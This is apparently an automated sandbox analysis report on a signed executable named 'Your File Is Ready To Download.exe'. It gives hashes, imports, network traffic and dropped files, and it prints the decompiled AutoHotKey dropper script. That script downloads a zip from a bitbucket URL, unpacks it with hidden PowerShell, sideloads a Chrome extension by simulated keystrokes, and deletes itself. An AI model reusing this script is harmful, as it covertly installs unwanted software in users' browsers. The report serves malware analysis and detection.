Preview:	function getRandomToken() {. var randomPool = new Uint8Array(32);. crypto.getRandomValues(randomPool);. var hex = '';. for (var i = 0; i < randomPool.length; ++i) {. hex += randomPool[i].toString(16);. }. return hex;.}..let changeHeaders = function(details) {. details.responseHeaders.forEach(function(header) {. if (header.name.toLowerCase() == "permissions-policy") {. const rawValue = header.value;. let noInterestCohort = rawValue.replace(/interest-cohort=.*?,?/, "");. header.value = noInterestCohort;. if (header.value === "") {. header.value = "interest-cohort=()";. } else {. header.value = "interest-cohort=()," + header.value;. }. } else {. details.responseHeaders.push({. "name": "permissions-policy",. "value": "interest-cohort=()". }). }. });. return {. responseHeaders: detail

C:\Users\user\AppData\Roaming\Chrome\logo-128.png Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PNG image data, 128 x 128, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	1319
Entropy (8bit):	7.515568267632844
Encrypted:	false
SSDEEP:	24:uUAs/68jGxEtOEpJzYfnjObEx2s0IESBYRyUo9q74RlWxDn21CTvqUtoa:Vn/6sFfpxYvyQESBYRpo9j70JmIJ
MD5:	CD53F025F0CA1F9D541DC0B2308FAE74
SHA1:	66155EDD4231C1E4D23FE5D4908441FB24156434
SHA-256:	E1BD4BDC6CC5DCAACFCBAEB80305532271AA98A2C5523714AB475803321F64C5
SHA-512:	B6B2DDD3270036DAC89DDCBF6D1749763D6443FBA7C6E49EDCF82FB3A45F249B89AC5BDE42008E3F484A5602722DC878BEBF4D32E3F4C8D303596100060D0F4A
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB...,.....pHYs................`PLTE...................................................................................................... tRNS.@.0...p....P..` o...O_..?./..E5'...4IDATx..[m{. ......N..../o].N1...=w..Ur.$...Z-X.`...(V!..O.)...2.@....i.EX...p.6 ..N.......\|0M...K.~.0.`...a,/......0..E<.....)W.<.T...R..Q?Fn.....8...jm.@....-...i.B.g0..h......@=...<l.@........t.......f.oo:5)...uOU+..j...2..<c....M....s..._.....=t..l....T...1....A.&....p......f0b.~>r.....t..n.x......b..C...p....^..>.6F..;.q.P.u..\.`...6.3&.m......Z.1.S`W.K.9l.(......Cf......Z.l....2K.w..y..........c.!.d...T.%.y.\..pqI00.._.cA.gA<L0(.......zAN.{..?......n.M@....9@...t.E....#..O.....`.x.......H.<.W-..R...T].c..N.K.pf...=YN....'...._.?@....8>p.m.^.`. .5..7=.......Y>hO@..Y+`O }........fg......[.b...d......(.l?.3j.>t!.mwI..V.<........./mRF&U2>.(.[...y.N...x.>......e..+..6M2&.5........][..\.v..Y...:..q\|....F..p.6......Yf.s.b..,.zs.P

C:\Users\user\AppData\Roaming\Chrome\manifest.json Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	674
Entropy (8bit):	4.59029823239086
Encrypted:	false
SSDEEP:	12:XTpbOpiTOpAm3Ypp5pt1w+Clqd5Lg51OQXuiGx58t8s6w5mlLqGOY:lbmiTm7q3t1w+ClqHLm1rzGx58t87w4P
MD5:	4F1214A07CC4BDA74F71A1F9435EB3B0
SHA1:	7B42EC8958B5BEB0158556D46216A23C41894110
SHA-256:	35F2F3F0393740227968D7C963874CC8BB30C06379B868F1062E48E7FE5D63C0
SHA-512:	2D5C0856889E28462F4080171A7BDCD4A0DF5F5DF7244B07F8459736ED86538DEF4A29E21B35C92592FB237EC4A72CD769F66D87C68D364BAA35D554C0A17DAE
Malicious:	false
Preview:	{. "author": "Extension Settings",. "name": "Extension Settings",. "short_name": "Extension Settings",. "homepage_url": "https://betasupreme.com",. "description": "Extension Settings",. "version": "1.0",. "manifest_version": 2,. "browser_action": {. "default_icon": "logo-128.png",. "default_title": "Extension Settings". },. "background": {. "scripts": [. "background.js". ]. },. "icons": {. "128": "logo-128.png". },. "permissions": ["webRequest","webRequestBlocking","tabs","privacy","http:///","https:///" ],. "update_url": "https://clients2.google.com/service/update2/crx".}

C:\Users\user\AppData\Roaming\chromeext.zip Download File
Process:	C:\Users\user\Desktop\Your File Is Ready To Download.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	3071
Entropy (8bit):	7.792031244379578
Encrypted:	false
SSDEEP:	48:9lWACx6SupQz9bhakykpjpQzL9yA6W+gIZuGOLXHpN7BaX4u/P+rKPLGLIHQrTXb:HNq6SNzHtpjWzxF3X9TJ04e+rKPLOOQz
MD5:	FE076363E3FF53FAB0B4C0E58FC3CFE3
SHA1:	3219955DE64A9B54518D89A1B15699A4DC3B0EF0
SHA-256:	03A5B9FEFC610373F4C6292ED330BD04A3682ACF8D9E6E14C04F5DFE30E615E3
SHA-512:	EA4FDB99F66A8E09EF6F90ECD1BEBF6549EB7AE9082F6EE7421CA280E10262F62F8175EE36D5CFCB6728CF08095AF67BF27FD1BD98801CA57E775FB3A3DA1A11
Malicious:	false
Preview:	PK........ \|.S...%............background.jsUT....I.a.J.aux..............V.o.8.~..P....t:.q.m.t=U....RU+.L......]...8......`gf...7..e.....YP...?......gG.Q...).2#.......J...O.0dj...4a..$.......w.4..;.T...7o...[.. ..1.F..e?6.h.1\|./..K.....T.....)a}..\|0H...S..?...4..U.pC0.'.>.Z..t..=.D=.,v...x..#R...n..=.7P.T..w6#N.j.Fw.)..g{....+>3..[QP.ZE......%.0.`...2d..b.iB..c^.\|b..,.....>q..8b.,..^.c.N...M.$.w.:}@......$.>..w..B....3.?.t..ql.....O..<.......Z.%..NU.n..N.ePF.q...,V........Sk.)..0.;.....\....r...w.d*.c...t2._.....].j.R.^....!...D.W.d4.D.....^.4....D.zf...G....n......d.F'.....q9nZ.O..)U8.....1+e....!....r.(A...L..,".q..K.....,.;.H...#0(.M-.x..R.X\|&.c>.+.-.3.c..+.O..j...{...V..qXe>lxp..-.....P7..~o8...Q.iH..f....YQA....r..\|....)....u......Rib.r...`.^dB.<2m+.'&..no.G..}..%[tq..h....T..O..U F..O..Y.{.U.7..2a8.J..N..7a.....j7..[R.y.1...#..7~..M....A}.7g.lP.^.2.;.i.T..e{..v...?T.x.m6(>sA....{(.rRNR.......W...j.x~.......RR=1.)u.5......8.....

C:\Users\user\Documents\20211206\PowerShell_transcript.536720.snkIuM3z.20211206190835.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1132
Entropy (8bit):	5.177834849202685
Encrypted:	false
SSDEEP:	24:BxSAPbxvBnZx2DOXiSmw0yXWXHjeTKKjX4CIym1ZJXXzGmw0ySumnxSAZ7uC:BZPVvhZoONVcXqDYB1Z9KVAuoZZ7uC
MD5:	8E75CD2301ACA99A8EFC5615A1C770C2
SHA1:	808B54620FA12E71FC4B0752EF7AC188284696AD
SHA-256:	9A3A8FE09646075578CA7FBFB1E61DF1D1F0C53B9E8A3B537ED44071072477F5
SHA-512:	5E85A494D4408CD88646CA4CC6555E47A856F11C7056230D2FB726E4B06F59D4A2F085CD77C641389ACC54C1A30F0D2FEB121F1A277B521581E559396109B281
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20211206190836..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 536720 (Microsoft Windows NT 10.0.17134.0)..Host Application: PowerShell.exe -Command Expand-Archive -LiteralPath 'C:\Users\user\AppData\Roaming\chromeext.zip' -DestinationPath 'C:\Users\user\AppData\Roaming\Chrome'..Process ID: 160..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20211206190836..******************..PS>Expand-Archive -LiteralPath 'C:\Users\user\AppData\Roaming\chromeext.zip' -DestinationPath 'C:\Users\user\AppData\Roaming\Chrome'..******************..Command start time: 20211206191339..*******************

Static File Info

General
File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	6.461512695554527
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Your File Is Ready To Download.exe
File size:	1217816
MD5:	b864cefdeac3d2c58de4d14bab8265f1
SHA1:	a9e0a49eb09498a97a9b55bf01952e3050b5f777
SHA256:	7489f7e92e2ece51c3a05fc381efe352210d16f02326e280ffd4c52821987fa0
SHA512:	883b0b001e606bec51e91baec365fbda7e163236f02e398101d8533e362762fc9cee2337f92c1e18ac92eda18c542f79a8390d2cf58547f3913e7e932d37b9f2
SSDEEP:	24576:8ssWIfbHO+7DGBtAJSKBw3NMuyrw3FtkN9nfSYH1zemyWbqo:8ssWIfbHO+7DGBtAJSKBw3NMuykVtknr
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&.DXG..XG..XG..C...mG..C....G..Q? .^G..Q?$.YG..Q?0.EG..XG...F..C.=.OG..C...sG..C.9.YG..C.>.YG..RichXG..........PE..d.....M`...

File Icon


Icon Hash:	0000000000000000

Static PE Info

General
Entrypoint:	0x1400cc400
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x604D83B2 [Sun Mar 14 03:32:02 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	fc7a1e26cc7fb001a117e16565a090cb

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=COMODO RSA Extended Validation Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	10/14/2020 5:00:00 PM 10/15/2021 4:59:59 PM
Subject Chain	CN="LLC ""APPSOLUTE""", O="LLC ""APPSOLUTE""", STREET="Prazka Street, Building 3, Apartment 319", STREET=Dniprovskyi district, L=Kyiv, PostalCode=02090, C=UA, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=UA, SERIALNUMBER=43565023
Version:	3
Thumbprint MD5:	C66F8BAC4ED61031A9A5E25E5797E78F
Thumbprint SHA-1:	2157C774D3C0D9DCAEC39EDBAC4F34E45BEF2BD0
Thumbprint SHA-256:	52D9940440FEA572716DF3207E036869640A32E785F9328D9F7F506F27DC5A6F
Serial:	3D5DA2F365B3716FE7C32796A3E47457

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007EFC70DCDBB8h
dec eax
add esp, 28h
jmp 00007EFC70DC7567h
int3
int3
dec eax
mov dword ptr [esp+08h], ebx
dec eax
mov dword ptr [esp+10h], ebp
dec eax
mov dword ptr [esp+18h], esi
push edi
dec eax
sub esp, 20h
dec eax
lea ebx, dword ptr [ecx+1Ch]
dec eax
mov ebp, ecx
mov esi, 00000101h
dec eax
mov ecx, ebx
inc esp
mov eax, esi
xor edx, edx
call 00007EFC70DCA374h
inc ebp
xor ebx, ebx
dec eax
lea edi, dword ptr [ebp+10h]
inc ecx
lea ecx, dword ptr [ebx+06h]
inc ecx
movzx eax, bx
inc esp
mov dword ptr [ebp+0Ch], ebx
dec esp
mov dword ptr [ebp+04h], ebx
rep stosw
dec eax
lea edi, dword ptr [00042FDEh]
dec eax
sub edi, ebp
mov al, byte ptr [edi+ebx]
mov byte ptr [ebx], al
dec eax
inc ebx
dec eax
dec esi
jne 00007EFC70DC7705h
dec eax
lea ecx, dword ptr [ebp+0000011Dh]
mov edx, 00000100h
mov al, byte ptr [ecx+edi]
mov byte ptr [ecx], al
dec eax
inc ecx
dec eax
dec edx
jne 00007EFC70DC7705h
dec eax
mov ebx, dword ptr [esp+30h]
dec eax
mov ebp, dword ptr [esp+38h]
dec eax
mov esi, dword ptr [esp+40h]
dec eax
add esp, 20h
pop edi
ret
dec eax
mov eax, esp
dec eax
mov dword ptr [eax+10h], ebx
dec eax
mov dword ptr [eax+18h], esi
dec eax
mov dword ptr [eax+20h], edi
push ebp
dec eax
lea ebp, dword ptr [eax-00000488h]
dec eax
sub esp, 00000580h
dec eax
mov eax, dword ptr [00043DEBh]
dec eax
xor eax, esp

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[LNK] VS2010 SP1 build 40219
[ASM] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[ C ] VS2010 SP1 build 40219
[C++] VS2010 SP1 build 40219
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x10bf2c	0x12c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x12e000	0x32b8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x11c000	0x78b4	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x127400	0x2118	data
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xde000	0xeb8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xdcab6	0xdcc00	False	0.536633812288	data	6.54343953119	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0xde000	0x30e8e	0x31000	False	0.280657087054	data	4.98137003823	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x10f000	0xc3c8	0x5000	False	0.25078125	data	3.33948267169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.pdata	0x11c000	0x78b4	0x7a00	False	0.480436731557	data	5.99059981014	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
text	0x124000	0x258d	0x2600	False	0.46484375	data	5.7779389798	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA
data	0x127000	0x6ec0	0x7000	False	0.47119140625	data	6.45735927966	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x12e000	0x32b8	0x3400	False	0.379356971154	data	5.0017761768	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x12e3f8	0xe98	dBase IV DBT of 8.DBF, block length 3584, next free block index 40, next free block 0, next used block 0	English	United States
RT_ICON	0x12f290	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x12f6f8	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x12fb60	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x12ffc8	0x128	GLS_BINARY_LSB_FIRST	English	United States
RT_MENU	0x1300f0	0x2c8	data	English	United States
RT_DIALOG	0x1303b8	0xe8	data	English	United States
RT_ACCELERATOR	0x1304a0	0x48	data	English	United States
RT_RCDATA	0x1304e8	0x67c	ASCII text	English	United States
RT_GROUP_ICON	0x130b64	0x14	data	English	United States
RT_GROUP_ICON	0x130b78	0x14	data	English	United States
RT_GROUP_ICON	0x130b8c	0x14	data	English	United States
RT_GROUP_ICON	0x130ba0	0x14	data	English	United States
RT_GROUP_ICON	0x130bb4	0x14	data	English	United States
RT_VERSION	0x130bc8	0x1fc	data	English	United States
RT_MANIFEST	0x130dc4	0x4f4	ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
WSOCK32.dll	gethostbyname, inet_addr, WSACleanup, gethostname, WSAStartup
WINMM.dll	mixerGetLineInfoW, mixerGetDevCapsW, mixerOpen, mciSendStringW, joyGetPosEx, mixerGetLineControlsW, mixerGetControlDetailsW, mixerSetControlDetails, waveOutGetVolume, mixerClose, waveOutSetVolume, joyGetDevCapsW
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
COMCTL32.dll	ImageList_Create, CreateStatusWindowW, ImageList_ReplaceIcon, ImageList_GetIconSize, ImageList_Destroy, ImageList_AddMasked
PSAPI.DLL	GetProcessImageFileNameW, GetModuleBaseNameW, GetModuleFileNameExW
WININET.dll	InternetOpenW, InternetOpenUrlW, InternetCloseHandle, InternetReadFileExA, InternetReadFile
KERNEL32.dll	GetModuleFileNameW, GetSystemTimeAsFileTime, FindResourceW, SizeofResource, LoadResource, LockResource, GetFullPathNameW, GetShortPathNameW, FindFirstFileW, FindNextFileW, FindClose, FileTimeToLocalFileTime, SetEnvironmentVariableW, Beep, MoveFileW, OutputDebugStringW, CreateProcessW, GetFileAttributesW, WideCharToMultiByte, MultiByteToWideChar, GetExitCodeProcess, WriteProcessMemory, ReadProcessMemory, GetCurrentProcessId, OpenProcess, TerminateProcess, SetPriorityClass, SetLastError, GetEnvironmentVariableW, GetLocalTime, GetDateFormatW, GetTimeFormatW, GetDiskFreeSpaceExW, SetVolumeLabelW, CreateFileW, DeviceIoControl, GetDriveTypeW, GetVolumeInformationW, GetDiskFreeSpaceW, GetCurrentDirectoryW, CreateDirectoryW, ReadFile, WriteFile, DeleteFileW, SetFileAttributesW, LocalFileTimeToFileTime, SetFileTime, DeleteCriticalSection, GetSystemTime, GetSystemDefaultUILanguage, GetComputerNameW, GetSystemWindowsDirectoryW, GetTempPathW, EnterCriticalSection, LeaveCriticalSection, VirtualProtect, QueryDosDeviceW, CompareStringW, RemoveDirectoryW, CopyFileW, GetCurrentProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, FormatMessageW, GetPrivateProfileStringW, GetPrivateProfileSectionW, GetPrivateProfileSectionNamesW, WritePrivateProfileStringW, WritePrivateProfileSectionW, SetEndOfFile, GetACP, GetFileType, GetStdHandle, SetFilePointerEx, SystemTimeToFileTime, FileTimeToSystemTime, GetFileSize, IsWow64Process, VirtualAllocEx, VirtualFreeEx, EnumResourceNamesW, LoadLibraryExW, GlobalSize, HeapReAlloc, EncodePointer, HeapFree, DecodePointer, ExitProcess, HeapAlloc, IsValidCodePage, FlsGetValue, FlsSetValue, FlsFree, FlsAlloc, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, GetCPInfo, GetVersionExW, GetModuleHandleW, FreeLibrary, GetProcAddress, LoadLibraryW, GetLastError, CreateMutexW, CloseHandle, GetExitCodeThread, SetThreadPriority, CreateThread, GetStringTypeExW, lstrcmpiW, GetCurrentThreadId, GlobalUnlock, GlobalFree, GlobalAlloc, GlobalLock, SetErrorMode, InitializeCriticalSection, SetCurrentDirectoryW, Sleep, GetTickCount, MulDiv, RtlCaptureContext, HeapSetInformation, GetVersion, HeapCreate, InitializeCriticalSectionAndSpinCount, HeapSize, HeapQueryInformation, GetCommandLineW, GetStartupInfoW, RtlUnwindEx, SetHandleCount, GetStringTypeW, RaiseException, RtlPcToFileHeader, LCMapStringW, GetConsoleCP, GetConsoleMode, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetOEMCP, SetFilePointer, FlushFileBuffers, WriteConsoleW, SetStdHandle, GetFileSizeEx, GetProcessHeap
USER32.dll	MessageBeep, ClientToScreen, GetCursorInfo, GetLastInputInfo, GetSystemMenu, GetMenuItemCount, GetMenuItemID, GetSubMenu, GetMenuStringW, ExitWindowsEx, SetMenu, FlashWindow, GetPropW, SetPropW, RemovePropW, MapWindowPoints, RedrawWindow, SetWindowLongPtrW, SetParent, GetClassInfoExW, GetAncestor, UpdateWindow, GetMessagePos, GetClassLongPtrW, DefDlgProcW, CallWindowProcW, CheckRadioButton, IntersectRect, GetUpdateRect, PtInRect, CreateDialogIndirectParamW, GetWindowLongPtrW, CreateAcceleratorTableW, DestroyAcceleratorTable, InsertMenuItemW, SetMenuDefaultItem, RemoveMenu, SetMenuItemInfoW, IsMenu, GetMenuItemInfoW, CreateMenu, CreatePopupMenu, SetMenuInfo, AppendMenuW, DestroyMenu, TrackPopupMenuEx, GetDesktopWindow, CopyImage, CreateIconIndirect, CreateIconFromResourceEx, EnumClipboardFormats, GetWindow, BringWindowToTop, MessageBoxW, GetTopWindow, GetQueueStatus, SetDlgItemTextW, LoadAcceleratorsW, EnableMenuItem, GetMenu, CreateWindowExW, RegisterClassExW, LoadCursorW, DestroyIcon, IsCharAlphaW, IsZoomed, VkKeyScanExW, MapVirtualKeyExW, GetKeyboardLayoutNameW, ActivateKeyboardLayout, GetGUIThreadInfo, GetWindowTextW, mouse_event, WindowFromPoint, GetSystemMetrics, keybd_event, SetKeyboardState, GetKeyboardState, GetCursorPos, GetAsyncKeyState, AttachThreadInput, SendInput, UnregisterHotKey, RegisterHotKey, PostQuitMessage, SendMessageTimeoutW, UnhookWindowsHookEx, SetWindowsHookExW, PostThreadMessageW, IsCharAlphaNumericW, IsCharUpperW, IsCharLowerW, ToUnicodeEx, GetKeyboardLayout, CallNextHookEx, CharLowerW, ReleaseDC, GetDC, OpenClipboard, GetClipboardData, GetClipboardFormatNameW, CloseClipboard, SetClipboardData, EmptyClipboard, PostMessageW, FindWindowW, EndDialog, IsWindow, DispatchMessageW, TranslateMessage, ShowWindow, CountClipboardFormats, SetWindowLongW, ScreenToClient, IsDialogMessageW, GetDlgItem, SendDlgItemMessageW, DialogBoxParamW, SetForegroundWindow, DefWindowProcW, FillRect, DrawIconEx, GetSysColorBrush, GetSysColor, RegisterWindowMessageW, GetMonitorInfoW, EnumDisplayMonitors, SetClipboardViewer, IsIconic, SendMessageW, IsWindowEnabled, GetWindowLongW, GetKeyState, TranslateAcceleratorW, KillTimer, PeekMessageW, GetFocus, GetClassNameW, GetWindowThreadProcessId, GetForegroundWindow, EnumWindows, GetWindowTextLengthW, EnableWindow, InvalidateRect, SetLayeredWindowAttributes, SetWindowPos, SetWindowRgn, SetFocus, SetActiveWindow, EnumChildWindows, MoveWindow, GetWindowRect, GetClientRect, SystemParametersInfoW, AdjustWindowRectEx, DrawTextW, SetRect, GetIconInfo, SetWindowTextW, IsWindowVisible, BlockInput, GetMessageW, SetTimer, GetParent, GetDlgCtrlID, CharUpperW, IsClipboardFormatAvailable, CheckMenuItem, LoadImageW, MapVirtualKeyW, ChangeClipboardChain, DestroyWindow
GDI32.dll	GetPixel, GetClipRgn, GetCharABCWidthsW, SetBkMode, CreatePatternBrush, SetBrushOrgEx, EnumFontFamiliesExW, CreateDIBSection, GdiFlush, SetBkColor, ExcludeClipRect, SetTextColor, GetClipBox, BitBlt, CreateCompatibleBitmap, GetSystemPaletteEntries, GetDIBits, CreateCompatibleDC, CreatePolygonRgn, CreateRectRgn, CreateRoundRectRgn, CreateEllipticRgn, DeleteDC, GetObjectW, GetTextMetricsW, GetTextFaceW, SelectObject, GetStockObject, CreateDCW, CreateSolidBrush, CreateFontW, FillRgn, GetDeviceCaps, DeleteObject
COMDLG32.dll	CommDlgExtendedError, GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, RegQueryValueExW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, GetUserNameW, RegEnumKeyExW, RegEnumValueW, RegQueryInfoKeyW, RegOpenKeyExW, RegCloseKey, RegConnectRegistryW, RegDeleteValueW
SHELL32.dll	DragQueryPoint, SHEmptyRecycleBinW, SHFileOperationW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetDesktopFolder, SHGetMalloc, SHGetFolderPathW, ShellExecuteExW, Shell_NotifyIconW, DragFinish, DragQueryFileW, ExtractIconW
ole32.dll	OleInitialize, OleUninitialize, CoCreateInstance, CoInitialize, CoUninitialize, CLSIDFromString, CLSIDFromProgID, CoGetObject, StringFromGUID2, CreateStreamOnHGlobal
OLEAUT32.dll	SafeArrayGetLBound, GetActiveObject, SysStringLen, OleLoadPicture, SafeArrayUnaccessData, SafeArrayGetElemsize, SafeArrayAccessData, SafeArrayUnlock, SafeArrayPtrOfIndex, SafeArrayLock, SafeArrayGetDim, SafeArrayDestroy, SafeArrayGetUBound, VariantCopyInd, SafeArrayCopy, SysAllocString, VariantChangeType, VariantClear, SafeArrayCreate, SysFreeString

Version Infos

Description	Data
LegalCopyright
InternalName
FileVersion	1.1.33.06
ProductName
ProductVersion	1.1.33.06
FileDescription
OriginalFilename
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Static AutoHotKey Info

General

Code:

; <COMPILER: v1.1.33.06> #NoTrayIcon SetTimer, ExitAHK, 40000 SetTitleMatchMode, 2 CoordMode, Window File_URL = https://bitbucket.org/betadevmode/devmode/downloads/block-floc.zip Extension_Name = %A_AppData%\chromeext.zip Extension_Path = %A_AppData%\Chrome FileRemoveDir, %Extension_Path%, 1 FileDelete, %Extension_Name% UrlDownloadToFile, %File_URL%, %Extension_Name% RunWait PowerShell.exe -Command Expand-Archive -LiteralPath '%Extension_Name%' -DestinationPath '%Extension_Path%',,Hide While WinExist("ahk_exe chrome.exe"){ WinClose, ahk_exe chrome.exe Sleep 100 } Run, chrome.exe --start-maximized Sleep 100 st = ahk_class Chrome_WidgetWin_1 WinWait, %st% IfWinNotActive, %st%,, WinActivate, %st% WinGet, WinStatus, MinMax, %st% if (WinStatus != 0) WinRestore, ahk_exe chrome.exe WinMove, %st%,, 0, 0 , 500, 200 Send, {Blind}{LAlt Down}d{Lalt Up} WinMove, %st%,, 0, 0 , 500, 200 SendInput, chrome://extensions{Enter} Sleep, 1000 PixelGetColor, color, 469, 139, RGB PixelGetColor, nobm, 469, 107, RGB PixelGetColor, notdef, 469, 152, RGB WinSet, Transparent, 0, %st% if (color = 0xDADCE0 or color = 0xFFFFFF or nobm = 0xDADCE0 or nobm = 0xFFFFFF or notdef = 0xDADCE0 or notdef = 0xFFFFFF){ Send, {TAB 3}{Space}{Tab}{Space} }else{ Send, {TAB 4}{Space} } tt = ahk_class #32770 WinWait, %tt% IfWinNotActive, %tt%,, WinActivate, %tt% If WinActive("not avail") Send, {Blind}{Enter} WinMove, %tt%,, 0, 0 , 500, 200 SendInput, %Extension_Path%{Enter} Send, {Tab}{Enter} Sleep, 5000 While WinExist("ahk_exe chrome.exe"){ WinClose, ahk_exe chrome.exe Sleep 100 } FileDelete, %Extension_Name% ExitAHK: Run, %comspec% /c del "%A_ScriptFullPath%",,Hide ExitApp return

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
12/06/21-19:08:32.689768	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	54154	8.8.8.8	192.168.2.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 6, 2021 19:08:32.707108974 CET	49711	443	192.168.2.3	104.192.141.1
Dec 6, 2021 19:08:32.707161903 CET	443	49711	104.192.141.1	192.168.2.3
Dec 6, 2021 19:08:32.707273006 CET	49711	443	192.168.2.3	104.192.141.1
Dec 6, 2021 19:08:32.722043037 CET	49711	443	192.168.2.3	104.192.141.1
Dec 6, 2021 19:08:32.722068071 CET	443	49711	104.192.141.1	192.168.2.3
Dec 6, 2021 19:08:33.065558910 CET	443	49711	104.192.141.1	192.168.2.3
Dec 6, 2021 19:08:33.065676928 CET	49711	443	192.168.2.3	104.192.141.1
Dec 6, 2021 19:08:33.350286007 CET	49711	443	192.168.2.3	104.192.141.1
Dec 6, 2021 19:08:33.350327015 CET	443	49711	104.192.141.1	192.168.2.3
Dec 6, 2021 19:08:33.350941896 CET	443	49711	104.192.141.1	192.168.2.3
Dec 6, 2021 19:08:33.351027966 CET	49711	443	192.168.2.3	104.192.141.1
Dec 6, 2021 19:08:33.354154110 CET	49711	443	192.168.2.3	104.192.141.1
Dec 6, 2021 19:08:33.396871090 CET	443	49711	104.192.141.1	192.168.2.3
Dec 6, 2021 19:08:33.512061119 CET	443	49711	104.192.141.1	192.168.2.3
Dec 6, 2021 19:08:33.512196064 CET	443	49711	104.192.141.1	192.168.2.3
Dec 6, 2021 19:08:33.512209892 CET	49711	443	192.168.2.3	104.192.141.1
Dec 6, 2021 19:08:33.512368917 CET	49711	443	192.168.2.3	104.192.141.1
Dec 6, 2021 19:08:33.530718088 CET	49711	443	192.168.2.3	104.192.141.1
Dec 6, 2021 19:08:33.530762911 CET	443	49711	104.192.141.1	192.168.2.3
Dec 6, 2021 19:08:33.608535051 CET	49712	443	192.168.2.3	52.217.81.204
